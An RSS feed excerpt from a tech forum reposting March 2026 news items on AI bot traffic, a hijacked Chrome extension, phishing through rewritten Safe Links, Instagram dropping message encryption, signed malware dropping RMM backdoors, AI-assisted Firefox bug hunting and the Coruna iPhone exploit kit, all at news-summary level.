		<item>
			<title><![CDATA[Cloudflare CEO warns AI bots could outnumber humans online by 2027]]></title>
			<link>https://www.geeks.fyi/showthread.php?tid=21681</link>
			<pubDate>Mon, 23 Mar 2026 11:03:40 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://www.geeks.fyi/member.php?action=profile&uid=1929">schreckdeividas</a>]]></dc:creator>
			<guid isPermaLink="false">https://www.geeks.fyi/showthread.php?tid=21681</guid>
			<description><![CDATA[<blockquote class="mycode_quote"><cite>Quote:</cite>The internet you use every day could soon be dominated by artificial intelligence. Cloudflare CEO Matthew Prince says that AI bots may generate more traffic than humans within the next year or two, marking a major shift in how the web works.<br />
<br />
Speaking about the current trends with TechCrunch, Prince said bot activity is growing rapidly as AI systems crawl and interact with websites at scale.<br />
<br />
Before the rise of generative AI, bots were responsible for only 20% of internet traffic. Most of that traffic came from search engines like Google, and some malicious activity. Now, that number is climbing much faster.</blockquote>
<br />
Source----@<a href="https://www.digitaltrends.com/computing/cloudflare-ceo-warns-ai-bots-could-outnumber-humans-online-by-2027/" target="_blank" rel="noopener" class="mycode_url">digitaltrends</a>]]></description>
			<content:encoded><![CDATA[<blockquote class="mycode_quote"><cite>Quote:</cite>The internet you use every day could soon be dominated by artificial intelligence. Cloudflare CEO Matthew Prince says that AI bots may generate more traffic than humans within the next year or two, marking a major shift in how the web works.<br />
<br />
Speaking about the current trends with TechCrunch, Prince said bot activity is growing rapidly as AI systems crawl and interact with websites at scale.<br />
<br />
Before the rise of generative AI, bots were responsible for only 20% of internet traffic. Most of that traffic came from search engines like Google, and some malicious activity. Now, that number is climbing much faster.</blockquote>
<br />
Source----@<a href="https://www.digitaltrends.com/computing/cloudflare-ceo-warns-ai-bots-could-outnumber-humans-online-by-2027/" target="_blank" rel="noopener" class="mycode_url">digitaltrends</a>]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Chrome Extension "Save Image as Type" Was Hijacked, Putting Over 1 Million Users at R]]></title>
			<link>https://www.geeks.fyi/showthread.php?tid=21670</link>
			<pubDate>Thu, 19 Mar 2026 10:56:49 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://www.geeks.fyi/member.php?action=profile&uid=1322">harlan4096</a>]]></dc:creator>
			<guid isPermaLink="false">https://www.geeks.fyi/showthread.php?tid=21670</guid>
			<description><![CDATA[<blockquote class="mycode_quote"><cite>Quote:</cite>Google has taken down the Chrome extension <span style="font-weight: bold;" class="mycode_b">"Save Image as Type"</span> after security researchers uncovered it had been hijacked and altered to redirect user traffic for affiliate commission fraud. The extension had over <span style="font-weight: bold;" class="mycode_b">a million users</span> when it was removed.<br />
<br />
The compromise was carried out by a group called Karma, which reportedly acquired the extension from its original developer sometime between November 13 and November 29, 2025, according to XDA Developers. By the end of November, new code had been inserted to intercept purchases made through retailers such as <span style="font-weight: bold;" class="mycode_b">Amazon, Adidas, and Shein</span>, enabling the attackers to collect affiliate commissions from transactions made by affected users.<br />
<br />
<span style="font-weight: bold;" class="mycode_b">What the Malicious Chrome Extension Code Did</span><br />
<br />
<img src="https://www.ghacks.net/wp-content/uploads/2026/03/gHacks-articles-2026-03-19T090025.237-1.png" loading="lazy"  alt="[Image: gHacks-articles-2026-03-19T090025.237-1.png]" class="mycode_img" /><br />
<br />
The injected code secretly redirected user traffic in the background, without any obvious signs in the browser. This meant that users browsing and buying from supported retail sites had their sessions altered to credit Karma's affiliate accounts.<br />
<br />
Despite this malicious activity, the extension continued to function normally as an image conversion tool, making it difficult to detect. Google took down the extension earlier in March 2026, but the harmful version had probably been active for several weeks before it was removed.<br />
<br />
<a href="https://www.ghacks.net/2026/03/19/chrome-extension-save-image-as-type-was-hijacked-putting-over-1-million-users-at-risk/" target="_blank" rel="noopener" class="mycode_url">Continue Reading...</a></blockquote>
]]></description>
			<content:encoded><![CDATA[<blockquote class="mycode_quote"><cite>Quote:</cite>Google has taken down the Chrome extension <span style="font-weight: bold;" class="mycode_b">"Save Image as Type"</span> after security researchers uncovered it had been hijacked and altered to redirect user traffic for affiliate commission fraud. The extension had over <span style="font-weight: bold;" class="mycode_b">a million users</span> when it was removed.<br />
<br />
The compromise was carried out by a group called Karma, which reportedly acquired the extension from its original developer sometime between November 13 and November 29, 2025, according to XDA Developers. By the end of November, new code had been inserted to intercept purchases made through retailers such as <span style="font-weight: bold;" class="mycode_b">Amazon, Adidas, and Shein</span>, enabling the attackers to collect affiliate commissions from transactions made by affected users.<br />
<br />
<span style="font-weight: bold;" class="mycode_b">What the Malicious Chrome Extension Code Did</span><br />
<br />
<img src="https://www.ghacks.net/wp-content/uploads/2026/03/gHacks-articles-2026-03-19T090025.237-1.png" loading="lazy"  alt="[Image: gHacks-articles-2026-03-19T090025.237-1.png]" class="mycode_img" /><br />
<br />
The injected code secretly redirected user traffic in the background, without any obvious signs in the browser. This meant that users browsing and buying from supported retail sites had their sessions altered to credit Karma's affiliate accounts.<br />
<br />
Despite this malicious activity, the extension continued to function normally as an image conversion tool, making it difficult to detect. Google took down the extension earlier in March 2026, but the harmful version had probably been active for several weeks before it was removed.<br />
<br />
<a href="https://www.ghacks.net/2026/03/19/chrome-extension-save-image-as-type-was-hijacked-putting-over-1-million-users-at-risk/" target="_blank" rel="noopener" class="mycode_url">Continue Reading...</a></blockquote>
]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Hackers Leverage Safe Links and URL Rewriting to Evade Detection]]></title>
			<link>https://www.geeks.fyi/showthread.php?tid=21663</link>
			<pubDate>Tue, 17 Mar 2026 11:59:11 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://www.geeks.fyi/member.php?action=profile&uid=1322">harlan4096</a>]]></dc:creator>
			<guid isPermaLink="false">https://www.geeks.fyi/showthread.php?tid=21663</guid>
			<description><![CDATA[<blockquote class="mycode_quote"><cite>Quote:</cite>Threat actors were already abusing URL rewriting mechanisms in phishing campaigns to mask malicious domains.<br />
<br />
URL rewriting is designed to protect users by replacing original links with security-vendor URLs that scan destinations at click time.<br />
<br />
These rewritten links route traffic through the provider’s infrastructure so they can analyze the page in real time, block known malicious sites, and log user activity for administrators. In normal operation, this is a defensive layer that helps filter out obviously bad destinations.​<br />
<br />
Threat actors, however, are turning this model on its head. By operating from compromised mailboxes that already use URL rewriting, they generate “pre-wrapped” safe links and then reuse those trusted-domain URLs in external phishing campaigns.<br />
<br />
<img src="https://www.levelblue.com/hs-fs/hubfs/Blogs/SpiderLab_Blog_Images/Fig01_examplephishlink.png?width=628&amp;height=164&amp;name=Fig01_examplephishlink.png" loading="lazy"  alt="[Image: Fig01_examplephishlink.png?width=628&amp;hei...shlink.png]" class="mycode_img" /><span style="font-style: italic;" class="mycode_i">Example of an original phishing link</span> (Source : LevelBlue<br />
<br />
SpiderLabs).The end result is a phishing link that visually and technically appears to belong to a reputable security or productivity provider, even though it eventually leads to a credential-harvesting site.<br />
<br />
From late 2024 into 2025, LevelBlue SpiderLabs <a href="https://www.levelblue.com/blogs/spiderlabs-blog/weaponizing-safe-links-abuse-of-multi-layered-url-rewriting-in-phishing-attacks" target="_blank" rel="noopener" class="mycode_url">observed a sharp rise in multi-layered URL </a>rewriting chains, where attackers nest multiple already‑rewritten links together.<br />
<br />
<a href="https://gbhackers.com/safe-links-and-url/" target="_blank" rel="noopener" class="mycode_url">Continue Reading...</a></blockquote>
]]></description>
			<content:encoded><![CDATA[<blockquote class="mycode_quote"><cite>Quote:</cite>Threat actors were already abusing URL rewriting mechanisms in phishing campaigns to mask malicious domains.<br />
<br />
URL rewriting is designed to protect users by replacing original links with security-vendor URLs that scan destinations at click time.<br />
<br />
These rewritten links route traffic through the provider’s infrastructure so they can analyze the page in real time, block known malicious sites, and log user activity for administrators. In normal operation, this is a defensive layer that helps filter out obviously bad destinations.​<br />
<br />
Threat actors, however, are turning this model on its head. By operating from compromised mailboxes that already use URL rewriting, they generate “pre-wrapped” safe links and then reuse those trusted-domain URLs in external phishing campaigns.<br />
<br />
<img src="https://www.levelblue.com/hs-fs/hubfs/Blogs/SpiderLab_Blog_Images/Fig01_examplephishlink.png?width=628&amp;height=164&amp;name=Fig01_examplephishlink.png" loading="lazy"  alt="[Image: Fig01_examplephishlink.png?width=628&amp;hei...shlink.png]" class="mycode_img" /><span style="font-style: italic;" class="mycode_i">Example of an original phishing link</span> (Source : LevelBlue<br />
<br />
SpiderLabs).The end result is a phishing link that visually and technically appears to belong to a reputable security or productivity provider, even though it eventually leads to a credential-harvesting site.<br />
<br />
From late 2024 into 2025, LevelBlue SpiderLabs <a href="https://www.levelblue.com/blogs/spiderlabs-blog/weaponizing-safe-links-abuse-of-multi-layered-url-rewriting-in-phishing-attacks" target="_blank" rel="noopener" class="mycode_url">observed a sharp rise in multi-layered URL </a>rewriting chains, where attackers nest multiple already‑rewritten links together.<br />
<br />
<a href="https://gbhackers.com/safe-links-and-url/" target="_blank" rel="noopener" class="mycode_url">Continue Reading...</a></blockquote>
]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Instagram Will Remove End-to-End Encryption for Messages in May 2026]]></title>
			<link>https://www.geeks.fyi/showthread.php?tid=21662</link>
			<pubDate>Tue, 17 Mar 2026 11:57:09 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://www.geeks.fyi/member.php?action=profile&uid=1322">harlan4096</a>]]></dc:creator>
			<guid isPermaLink="false">https://www.geeks.fyi/showthread.php?tid=21662</guid>
			<description><![CDATA[<blockquote class="mycode_quote"><cite>Quote:</cite>Instagram has confirmed it will remove <span style="font-weight: bold;" class="mycode_b">end-to-end encryption</span> from direct messages on <span style="font-weight: bold;" class="mycode_b">May 8, 2026.</span> The change was detailed in an updated <a href="https://help.instagram.com/1224884341728748" target="_blank" rel="noopener" class="mycode_url">Instagram Help Center page titled "What is end-to-end encryption on Instagram,"</a> first reported by PiunikaWeb. Some users received an in-app notification about the change when opening Instagram.<br />
<br />
Meta has not published a statement explaining the decision.<br />
<br />
<span style="font-weight: bold;" class="mycode_b">Instagram Messages Will No Longer Be End-to-End Encrypted</span><br />
<br />
End-to-end encryption ensures that only the sender and recipient can read messages, preventing third parties (including the platform itself) from accessing the content.<br />
<br />
Once the change takes effect, Instagram DMs will no longer have this protection, meaning conversations could potentially be accessed or reviewed by the company or other authorized parties. The announcement has quickly sparked debate online, with many users expressing concerns about losing a key privacy feature.<br />
<br />
<a href="https://www.ghacks.net/2026/03/16/instagram-will-remove-end-to-end-encryption-for-messages-in-may-2026/" target="_blank" rel="noopener" class="mycode_url">Continue Reading...</a></blockquote>
]]></description>
			<content:encoded><![CDATA[<blockquote class="mycode_quote"><cite>Quote:</cite>Instagram has confirmed it will remove <span style="font-weight: bold;" class="mycode_b">end-to-end encryption</span> from direct messages on <span style="font-weight: bold;" class="mycode_b">May 8, 2026.</span> The change was detailed in an updated <a href="https://help.instagram.com/1224884341728748" target="_blank" rel="noopener" class="mycode_url">Instagram Help Center page titled "What is end-to-end encryption on Instagram,"</a> first reported by PiunikaWeb. Some users received an in-app notification about the change when opening Instagram.<br />
<br />
Meta has not published a statement explaining the decision.<br />
<br />
<span style="font-weight: bold;" class="mycode_b">Instagram Messages Will No Longer Be End-to-End Encrypted</span><br />
<br />
End-to-end encryption ensures that only the sender and recipient can read messages, preventing third parties (including the platform itself) from accessing the content.<br />
<br />
Once the change takes effect, Instagram DMs will no longer have this protection, meaning conversations could potentially be accessed or reviewed by the company or other authorized parties. The announcement has quickly sparked debate online, with many users expressing concerns about losing a key privacy feature.<br />
<br />
<a href="https://www.ghacks.net/2026/03/16/instagram-will-remove-end-to-end-encryption-for-messages-in-may-2026/" target="_blank" rel="noopener" class="mycode_url">Continue Reading...</a></blockquote>
]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Signed malware posing as Teams and Zoom apps drops RMM backdoors]]></title>
			<link>https://www.geeks.fyi/showthread.php?tid=21643</link>
			<pubDate>Tue, 10 Mar 2026 10:19:36 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://www.geeks.fyi/member.php?action=profile&uid=1322">harlan4096</a>]]></dc:creator>
			<guid isPermaLink="false">https://www.geeks.fyi/showthread.php?tid=21643</guid>
			<description><![CDATA[<blockquote class="mycode_quote"><cite>Quote:</cite>A wave of phishing campaigns that used signed malware posing as popular workplace apps like Microsoft Teams, Zoom, and Adobe Reader to deploy remote monitoring and management (RMM) backdoors.<br />
<br />
The activity, attributed to an as-yet unidentified threat actor, highlights how trusted branding and valid-looking digital signatures can be abused to gain stealthy, long-term access in enterprise networks.<br />
<br />
According to Microsoft, the campaigns relied on convincing phishing emails that spoofed common workplace themes such as meeting invitations, invoices, project bids, and internal notifications.<br />
<br />
In February 2026, Microsoft Defender Experts <a href="https://www.microsoft.com/en-us/security/blog/2026/03/03/signed-malware-impersonating-workplace-apps-deploys-rmm-backdoors/" target="_blank" rel="noopener" class="mycode_url">identified multiple phishing campaigns </a>attributed to an unknown threat actor.<br />
<br />
Messages either attached counterfeit PDFs or embedded links that redirected users to attacker-controlled download pages closely mimicking legitimate Adobe, Teams, or Zoom portals.<br />
<br />
Victims were encouraged to “update” or “open” documents via prominent buttons and prompts, which instead delivered Windows executables masquerading as trusted apps, including msteams.exe, trustconnectagent.exe, adobereader.exe, zoomworkspace.clientsetup.exe, and invite.exe.<br />
<br />
<a href="https://gbhackers.com/signed-malware/" target="_blank" rel="noopener" class="mycode_url">Continue Reading...</a></blockquote>
]]></description>
			<content:encoded><![CDATA[<blockquote class="mycode_quote"><cite>Quote:</cite>A wave of phishing campaigns that used signed malware posing as popular workplace apps like Microsoft Teams, Zoom, and Adobe Reader to deploy remote monitoring and management (RMM) backdoors.<br />
<br />
The activity, attributed to an as-yet unidentified threat actor, highlights how trusted branding and valid-looking digital signatures can be abused to gain stealthy, long-term access in enterprise networks.<br />
<br />
According to Microsoft, the campaigns relied on convincing phishing emails that spoofed common workplace themes such as meeting invitations, invoices, project bids, and internal notifications.<br />
<br />
In February 2026, Microsoft Defender Experts <a href="https://www.microsoft.com/en-us/security/blog/2026/03/03/signed-malware-impersonating-workplace-apps-deploys-rmm-backdoors/" target="_blank" rel="noopener" class="mycode_url">identified multiple phishing campaigns </a>attributed to an unknown threat actor.<br />
<br />
Messages either attached counterfeit PDFs or embedded links that redirected users to attacker-controlled download pages closely mimicking legitimate Adobe, Teams, or Zoom portals.<br />
<br />
Victims were encouraged to “update” or “open” documents via prominent buttons and prompts, which instead delivered Windows executables masquerading as trusted apps, including msteams.exe, trustconnectagent.exe, adobereader.exe, zoomworkspace.clientsetup.exe, and invite.exe.<br />
<br />
<a href="https://gbhackers.com/signed-malware/" target="_blank" rel="noopener" class="mycode_url">Continue Reading...</a></blockquote>
]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Mozilla says Claude AI uncovered over 100 Firefox bugs in just two weeks, including 1]]></title>
			<link>https://www.geeks.fyi/showthread.php?tid=21642</link>
			<pubDate>Sun, 08 Mar 2026 17:10:56 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://www.geeks.fyi/member.php?action=profile&uid=1322">harlan4096</a>]]></dc:creator>
			<guid isPermaLink="false">https://www.geeks.fyi/showthread.php?tid=21642</guid>
			<description><![CDATA[<blockquote class="mycode_quote"><cite>Quote:</cite><span style="font-size: medium;" class="mycode_size">Apparently AI can accelerate both attacks and defenses in computer security</span><br />
 <br />
<span style="font-weight: bold;" class="mycode_b">The takeaway:</span> While some companies are struggling with a flood of unreliable or hallucinated AI-generated bug reports, Mozilla is finding real value in bug-seeking bots. The foundation has begun working with Anthropic to strengthen Firefox's security, and several AI-assisted bug fixes have already landed in the browser's codebase.<br />
 <br />
Mozilla is now working with Anthropic's Frontier Red Team to identify and patch potentially dangerous security vulnerabilities in <a href="https://www.techspot.com/downloads/19-mozilla-firefox.html" target="_blank" rel="noopener" class="mycode_url">Firefox</a>. According to Mozilla, the AI company approached them a few weeks ago with results from a newly developed, AI-assisted bug-hunting method. The approach appears to work, Mozilla said, and could ultimately lead to a safer Firefox experience for everyone.<br />
 <br />
Anthropic's team focused on Firefox's JavaScript engine, in part because the Red Panda browser offers a widely used and "deeply scrutinized" open-source codebase that makes it ideal for testing new analysis techniques. The AI system <a href="https://blog.mozilla.org/en/firefox/hardening-firefox-anthropic-red-team/" target="_blank" rel="noopener" class="mycode_url">uncovered</a> several security flaws in the JS engine and also produced minimal test cases, allowing Firefox developers to quickly verify and reproduce the issues.<br />
<br />
<a href="https://www.techspot.com/news/111600-mozilla-claude-ai-uncovered-over-100-firefox-bugs.html" target="_blank" rel="noopener" class="mycode_url">Continue Reading...</a></blockquote>
]]></description>
			<content:encoded><![CDATA[<blockquote class="mycode_quote"><cite>Quote:</cite><span style="font-size: medium;" class="mycode_size">Apparently AI can accelerate both attacks and defenses in computer security</span><br />
 <br />
<span style="font-weight: bold;" class="mycode_b">The takeaway:</span> While some companies are struggling with a flood of unreliable or hallucinated AI-generated bug reports, Mozilla is finding real value in bug-seeking bots. The foundation has begun working with Anthropic to strengthen Firefox's security, and several AI-assisted bug fixes have already landed in the browser's codebase.<br />
 <br />
Mozilla is now working with Anthropic's Frontier Red Team to identify and patch potentially dangerous security vulnerabilities in <a href="https://www.techspot.com/downloads/19-mozilla-firefox.html" target="_blank" rel="noopener" class="mycode_url">Firefox</a>. According to Mozilla, the AI company approached them a few weeks ago with results from a newly developed, AI-assisted bug-hunting method. The approach appears to work, Mozilla said, and could ultimately lead to a safer Firefox experience for everyone.<br />
 <br />
Anthropic's team focused on Firefox's JavaScript engine, in part because the Red Panda browser offers a widely used and "deeply scrutinized" open-source codebase that makes it ideal for testing new analysis techniques. The AI system <a href="https://blog.mozilla.org/en/firefox/hardening-firefox-anthropic-red-team/" target="_blank" rel="noopener" class="mycode_url">uncovered</a> several security flaws in the JS engine and also produced minimal test cases, allowing Firefox developers to quickly verify and reproduce the issues.<br />
<br />
<a href="https://www.techspot.com/news/111600-mozilla-claude-ai-uncovered-over-100-firefox-bugs.html" target="_blank" rel="noopener" class="mycode_url">Continue Reading...</a></blockquote>
]]></content:encoded>
		</item>
		<item>
			<title><![CDATA[Leaked iPhone Spyware ‘Coruna’ Now Steals Crypto and Sensitive User Data]]></title>
			<link>https://www.geeks.fyi/showthread.php?tid=21633</link>
			<pubDate>Wed, 04 Mar 2026 16:54:02 +0000</pubDate>
			<dc:creator><![CDATA[<a href="https://www.geeks.fyi/member.php?action=profile&uid=1322">harlan4096</a>]]></dc:creator>
			<guid isPermaLink="false">https://www.geeks.fyi/showthread.php?tid=21633</guid>
			<description><![CDATA[<blockquote class="mycode_quote"><cite>Quote:</cite>Security researchers say a powerful iPhone hacking framework once tied to surveillance operations is now being used in criminal campaigns to steal cryptocurrency and sensitive data from users.<br />
<br />
The exploit kit, known as Coruna, reportedly contains multiple exploit chains capable of compromising vulnerable iPhones through malicious websites.<br />
<br />
<span style="font-weight: bold;" class="mycode_b">Hackers Target WebKit and Older iOS Versions</span><br />
<br />
According to analysis from Google Threat Intelligence Group and mobile security company iVerify, the framework includes:<ul class="mycode_list"><li>Five full exploit chains<br />
</li>
<li>23 known iOS vulnerabilities<br />
</li>
<li>Techniques that bypass several Apple security protections<br />
</li>
</ul>
The attacks target WebKit, the browser engine used by all iOS browsers. That means simply visiting a malicious web page could compromise devices running older iOS builds.<br />
<br />
Once triggered, the exploit chain escalates privileges from the browser to kernel-level access, allowing attackers to install malware with root permissions.<br />
<br />
<a href="https://www.ghacks.net/2026/03/04/leaked-iphone-spyware-coruna-now-steals-crypto-and-sensitive-user-data/" target="_blank" rel="noopener" class="mycode_url">Continue Reading...</a></blockquote>
]]></description>
			<content:encoded><![CDATA[<blockquote class="mycode_quote"><cite>Quote:</cite>Security researchers say a powerful iPhone hacking framework once tied to surveillance operations is now being used in criminal campaigns to steal cryptocurrency and sensitive data from users.<br />
<br />
The exploit kit, known as Coruna, reportedly contains multiple exploit chains capable of compromising vulnerable iPhones through malicious websites.<br />
<br />
<span style="font-weight: bold;" class="mycode_b">Hackers Target WebKit and Older iOS Versions</span><br />
<br />
According to analysis from Google Threat Intelligence Group and mobile security company iVerify, the framework includes:<ul class="mycode_list"><li>Five full exploit chains<br />
</li>
<li>23 known iOS vulnerabilities<br />
</li>
<li>Techniques that bypass several Apple security protections<br />
</li>
</ul>
The attacks target WebKit, the browser engine used by all iOS browsers. That means simply visiting a malicious web page could compromise devices running older iOS builds.<br />
<br />
Once triggered, the exploit chain escalates privileges from the browser to kernel-level access, allowing attackers to install malware with root permissions.<br />
<br />
<a href="https://www.ghacks.net/2026/03/04/leaked-iphone-spyware-coruna-now-steals-crypto-and-sensitive-user-data/" target="_blank" rel="noopener" class="mycode_url">Continue Reading...</a></blockquote>
]]></content:encoded>
		</item>
	</channel>
</rss>